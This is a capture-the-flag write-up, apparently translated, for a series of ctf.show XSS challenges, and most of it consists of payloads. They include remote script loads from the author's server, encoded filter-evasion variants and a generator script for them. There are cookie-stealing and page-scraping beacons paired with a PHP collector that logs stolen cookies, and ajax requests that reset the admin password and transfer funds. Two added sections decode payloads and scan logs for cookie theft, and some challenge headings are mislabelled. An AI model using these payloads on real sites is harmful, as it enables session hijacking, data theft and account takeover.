Table of contents
- Preface
- web316
- web317-319
- All-in payload for some of the earlier challenges
- web320
- web321
- web322-324: the semicolon (;) is filtered
- web325: the dot (.) is filtered
- Generating the String.fromCharCode payload used above
- web327
- web328
- web329
- web320
- web331
- web322-323
- Reference links
Preface
The payloads below need to be URL-decoded on your end. Most of them rely on blind XSS through an XSS platform (the link is also at the very bottom). Where spaces are filtered, use / instead. Be aware that this may not really be a proper write-up: I forgot to back up my notes, so make do with this and work out the underlying principles yourselves.
web316
http://e6e20854-17e6-4e0e-9f6f-b3c7e176250c.chall.ctf.show/?msg=%3Cscript+src%3D%22http%3A%2F%2Fy4tacker.top%2Fhack.js%22%3E%3C%2Fscript%3E
web317-319
http://35ac8af3-3eaa-4b9c-98cc-0b78d38e6706.chall.ctf.show/?msg=%3Cinput+onfocus%3Deval%28atob%28this.id%29%29+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly95NHRhY2tlci50b3AvaGFjay5qcyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs%3D+autofocus%3E
All-in payload for some of the earlier challenges
<input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzOC5jYy8ySEpJIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>
web320
http://cc9e301d-d32a-4540-932a-6cd28d5d5acc.chall.ctf.show/?msg=<body/onload="document.write(String.fromCharCode(32,60,115,67,114,73,112,116,32,115,114,67,61,47,47,120,115,46,115,98,47,89,84,85,104,62,60,47,115,67,82,105,112,84,62));"
web321
http://cc9e301d-d32a-4540-932a-6cd28d5d5acc.chall.ctf.show/?msg=<body/onload="document.write(String.fromCharCode(32));document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(114));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(89));document.write(String.fromCharCode(84));document.write(String.fromCharCode(85));document.write(String.fromCharCode(104));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));"
web322-324: the semicolon (;) is filtered
<body/onload='document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(114));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(89));document.write(String.fromCharCode(84));document.write(String.fromCharCode(85));document.write(String.fromCharCode(104));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));'>
web325: the dot (.) is filtered
<body/onload=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>
web326: parentheses are filtered
<body/onload=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>
Generating the String.fromCharCode payload used above
# Step 1: encode the script tag once as a comma-separated list of char codes (res),
# usable in a single String.fromCharCode(...) call, and once as a chain of
# one-character document.write(String.fromCharCode(N)); calls (res2) for the
# challenges that leave ';' as the only usable separator.
a = "<sCrIpt srC=//xs.sb/YTUh></sCRipT>"
res = ''
res2 = ''
for i in a:
    tmp = ord(i)
    res += str(tmp)
    res += ","
    res2 += f"document.write(String.fromCharCode({str(tmp)}));"
# print(res)
# print(res2)

# Step 2: take the hex dump of the document.write(...) JavaScript and rewrite it
# as a \xNN-escaped string literal, so that eval("...") can be used when '.' or
# the parentheses are filtered.
a = "646f63756d656e742e777269746528537472696e672e66726f6d43686172436f64652836302c3131352c36372c3131342c37332c3131322c3131362c33322c3131352c3131342c36372c36312c34372c34372c3132302c3131352c34362c3131352c39382c34372c38392c38342c38352c3130342c36322c36302c34372c3131352c36372c38322c3130352c3131322c38342c363229293b"
z = 0
res = ''
for i in a:
    if z == 2:
        z = 0
    if z == 0:
        res += r"\x"   # start a new \xNN escape every two hex digits
    res += i
    z += 1
print(res)
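The reverse direction is what a reviewer, WAF tuner or SOC analyst needs: given a submitted string, peel off the \xNN and String.fromCharCode layers built above and see what it would actually write into the page. The following is an added example, not code from the original post; the function names, regexes and the triage check are my own, and the sample inputs are constructed from the character-code list the generator above emits.

```python
import re

# Added example, not from the original post: undo the two obfuscation layers
# seen in the payloads above (\xNN escapes inside eval("...") and chains of
# document.write(String.fromCharCode(...))) so a reviewer can see the markup
# a submitted string would actually write into the page.

FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
HEX_ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_fromcharcode(js: str) -> str:
    """Join the arguments of every String.fromCharCode(...) call into text.

    Handles one call with many arguments as well as the one-argument-per-call
    chain used once ';' is the only separator left.
    """
    pieces = []
    for m in FROMCHARCODE_RE.finditer(js):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        pieces.append("".join(chr(c) for c in codes))
    return "".join(pieces)


def decode_hex_escapes(js: str) -> str:
    """Replace JavaScript \\xNN escapes with the characters they stand for."""
    return HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), js)


def unwrap(js: str, max_layers: int = 5) -> str:
    """Peel layers until a pass changes nothing; return the innermost text."""
    cur = js
    for _ in range(max_layers):
        nxt = decode_hex_escapes(cur)
        inner = decode_fromcharcode(nxt)
        if inner:
            nxt = inner
        if nxt == cur:
            break
        cur = nxt
    return cur


def looks_like_markup_injection(text: str) -> bool:
    """Crude triage check on the decoded text: a script tag or a tag carrying an on* handler."""
    return re.search(r"<\s*script\b|<[^>]*\bon\w+\s*=", text, re.IGNORECASE) is not None


# Constructed samples, rebuilt from the character-code list the generator above emits
# (they decode to <sCrIpt srC=//xs.sb/YTUh></sCRipT>).
CODES = (60, 115, 67, 114, 73, 112, 116, 32, 115, 114, 67, 61, 47, 47, 120, 115, 46,
         115, 98, 47, 89, 84, 85, 104, 62, 60, 47, 115, 67, 82, 105, 112, 84, 62)
SAMPLE_SINGLE_CALL = f"document.write(String.fromCharCode({','.join(map(str, CODES))}));"
SAMPLE_CHAIN = "".join(f"document.write(String.fromCharCode({c}));" for c in CODES)
# Constructed eval("...") sample: document.write(String.fromCharCode(60,115,67,114,73,112,116,62));
# hex-escaped the same way the second loop above does it; decodes to <sCrIpt>.
SAMPLE_HEX = r'eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x36\x32\x29\x29\x3b")'

if __name__ == "__main__":
    for sample in (SAMPLE_SINGLE_CALL, SAMPLE_CHAIN, SAMPLE_HEX):
        decoded = unwrap(sample)
        print(repr(decoded), "->", "suspicious" if looks_like_markup_injection(decoded) else "benign")
```

Run it as a script to see each sample collapse to the same script tag. The point for a filter author is that blocking `<script` or `.` in the raw input says nothing about what the string becomes after the browser evaluates it; a check that only fires on the decoded form, like the one above, is what catches these variants.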
web327
Note that the recipient is admin; there is no filtering.
web328
Host it yourself; the goal is to steal the admin's cookie.
Write a JS file:
var img = new Image();
img.src = "http://y4tacker.top/index.php?q="+document.cookie
document.body.append(img);
And here is index.php:
<?php
$cookie = $_GET['q'];
$myFile = "cookie.txt";
file_put_contents($myFile, $cookie, FILE_APPEND);
?>
Register with:
<script src=your-JS-URL></script>
Then replace the cookie in your own browser with the captured one and open the user management page.
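From the defender's side, the image beacon above leaves a distinctive trace wherever the request is logged (an egress or forward proxy in front of the admin's browser, or a collector endpoint that happens to sit on your own infrastructure): a GET whose query string carries a session cookie's name=value pair, usually with a referer on the site under attack. The script below is an added example, not part of the original post; it runs that check over three constructed combined-format log lines, and the addresses, hostnames and cookie-name list are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added example, not from the original post: scan combined-format access logs for
# requests whose query string carries a session cookie, the trace left by a beacon
# such as img.src = ".../index.php?q=" + document.cookie.
# Everything below (log lines, addresses, hostnames, cookie names) is constructed.

SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?q=hello HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?q=PHPSESSID%3D0123abcd%3B%20role%3Dadmin HTTP/1.1" 200 12 "http://challenge.example/admin" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /hack.js HTTP/1.1" 200 90 "http://challenge.example/" "Mozilla/5.0"
"""

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Cookie names worth alerting on; add your application's own session cookie name.
SESSION_COOKIE_NAMES = ("PHPSESSID", "JSESSIONID", "session", "sessionid", "token")
COOKIE_PAIR_RE = re.compile(
    r"(?:^|;\s*)(" + "|".join(SESSION_COOKIE_NAMES) + r")=", re.IGNORECASE
)


def parse_line(line: str):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def cookie_names_in_query(target: str) -> list:
    """List session-cookie names that appear as name=value pairs inside any
    query-string value. parse_qs percent-decodes, so %3D and %3B become = and ;
    and the value reads like a raw document.cookie dump."""
    found = []
    for values in parse_qs(urlsplit(target).query, keep_blank_values=True).values():
        for value in values:
            found.extend(COOKIE_PAIR_RE.findall(value))
    return found


def find_exfil(log_text: str) -> list:
    """Return one record per request that smuggles a session cookie in its query."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        names = cookie_names_in_query(rec["target"])
        if names:
            hits.append({
                "ip": rec["ip"], "ts": rec["ts"], "target": rec["target"],
                "referer": rec["referer"], "cookie_names": names,
            })
    return hits


if __name__ == "__main__":
    for hit in find_exfil(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} leaked {hit['cookie_names']} "
              f"via {hit['target']} (referer {hit['referer']})")
```

Only the second sample line is reported. The cheaper fix is upstream of any detection: a session cookie flagged HttpOnly is never exposed through document.cookie, and a Content-Security-Policy that restricts img-src and connect-src stops the beacon from reaching an arbitrary host in the first place.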
web329
From this challenge on, the group owner set things up so that the cookie is invalidated before it reaches you, so switch approach and grab page elements instead.
Host it yourself:
var img = new Image();
img.src = "http://y4tacker.top/index.php?q=" + document.querySelector('#top > div.layui-container > div:nth-child(4) > div > div.layui-table-box > div.layui-table-body.layui-table-main').textContent;
document.body.append(img);
And the same index.php on the receiving side:
<?php
$cookie = $_GET['q'];
$myFile = "cookie.txt";
file_put_contents($myFile, $cookie, FILE_APPEND);
?>
web320
The previous challenge revealed that the password is admin*******, so just change the password.
$.ajax({url:"http://127.0.0.1/api/change.php?p=111111",success:function(result){}});
web331
$.ajax({
    url: "http://127.0.0.1/api/change.php",
    method: "POST",
    data: {
        'p': '111111'
    },
    cache: false,
    success: function(res){}
});
web322-323
One uses a GET request, the other a POST; the payload is similar to web331. The idea is to transfer money from admin to a new account you register, then buy the flag. You may also notice the challenge has a small bug: transferring money to yourself still makes your balance grow.
$.ajax({
    url: "http://127.0.0.1/api/amount.php",
    method: "POST",
    data: {
        'u': 'y4tacker',
        'a': 10000
    },
    cache: false,
    success: function(res){}
});